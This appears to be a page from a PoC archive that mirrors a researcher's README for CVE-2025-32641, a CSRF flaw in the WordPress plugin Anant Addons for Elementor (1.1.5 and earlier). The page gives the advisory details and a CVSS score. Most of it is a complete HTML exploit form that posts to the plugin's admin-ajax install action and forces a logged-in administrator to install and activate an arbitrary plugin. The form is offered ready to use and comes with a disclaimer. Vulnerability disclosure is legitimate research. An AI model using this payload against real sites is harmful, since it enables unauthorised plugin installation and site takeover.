Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-32641 PoC — WordPress plugin Anant Addons for Elementor 跨站请求伪造漏洞

Source
Associated Vulnerability
Title:WordPress plugin Anant Addons for Elementor 跨站请求伪造漏洞 (CVE-2025-32641)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Anant Addons for Elementor 1.1.5及之前版本存在跨站请求伪造漏洞,该漏洞源于跨站请求伪造。
Description
Anant Addons for Elementor <= 1.1.5 CSRF to Arbitrary Plugin Installation vulnerability 
Readme

# 🛡️ Anant Addons for Elementor <= 1.1.5 - CSRF to Arbitrary Plugin Installation

## 🧨 CVE-2025-32641
**Cross-Site Request Forgery (CSRF)** vulnerability in **anantaddons**' Anant Addons for Elementor  
This issue affects versions: **from unknown through 1.1.5**

- **Base Score**: 9.6 (CRITICAL)
- **CVSS Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`

---

## 🔍 Description

This vulnerability allows **unauthenticated attackers** to perform **arbitrary plugin installation** on behalf of a logged-in administrator without their knowledge.  
By crafting a malicious page or form, the attacker can silently force the admin to install and activate any plugin from the WordPress repository.

---

## 💥 Impact

- ✅ Arbitrary plugin installation  
- ✅ Plugin activation  
- ❌ No nonce or CSRF protection  
- ✅ Exploitable via a simple HTML page  
- ⚠️ Requires admin to be logged in and open the malicious page  

---

## 🧪 HTML Proof of Concept

```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Anant Addons for Elementor <= 1.1.5 CSRF Exploit</title>
  <style>
    body {
      background-color: #111;
      color: #0f0;
      font-family: monospace;
      padding: 40px;
    }
    h1 {
      color: #ff0055;
      font-size: 24px;
      border-bottom: 1px solid #555;
      padding-bottom: 10px;
    }
    .box {
      background-color: #222;
      border: 1px solid #444;
      padding: 20px;
      margin-top: 20px;
    }
    input[type="submit"] {
      background-color: #ff0055;
      color: #fff;
      border: none;
      padding: 10px 20px;
      font-weight: bold;
      cursor: pointer;
    }
    input[type="submit"]:hover {
      background-color: #cc0044;
    }
  </style>
</head>
<body>

  <h1>
    Anant Addons for Elementor <= 1.1.5<br>
    CSRF to Arbitrary Plugin Installation Vulnerability
  </h1>

  <div class="box">
    <p># By: <strong>Nxploited | Khaled Alenazi</strong></p>
    <p># Type: <strong>CSRF (No Nonce Validation)</strong></p>
    <p># Impact: <strong>Unauthenticated attacker can force admin to install and activate arbitrary WordPress plugins</strong></p>
  </div>

  <form action="http://192.168.100.74:888/wordpress/wp-admin/admin-ajax.php?action=install_act_plugin" method="POST" class="box">
    <input type="hidden" name="plugs" value="hello-dolly">
    <p>🎯 Click the button below to trigger plugin installation (admin session must be active):</p>
    <input type="submit" value="Exploit Now">
  </form>

</body>
</html>


```

> 🎯 When a logged-in administrator clicks this form (or it auto-submits in a malicious page), the plugin will be silently installed and activated.

---

## ⚠️ Disclaimer

This repository and content are for **educational and security research purposes only**.  
The author is **not responsible** for any misuse or damage caused by improper use of this information.  
Always perform testing on systems **you own or have explicit permission to test**.

---

*by: Nxploited | Khaled ALenazi*
File Snapshot

[4.0K] /data/pocs/afe7799b02047f1eba35dc994d10ee50d2bc58f5 ├── [1.1K] LICENSE └── [3.0K] README.md 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.